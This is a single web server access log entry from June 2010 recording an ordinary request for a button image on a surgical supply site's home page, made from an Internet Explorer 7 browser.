203.101.64.67 - - [21/Jun/2010:02:53:30 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
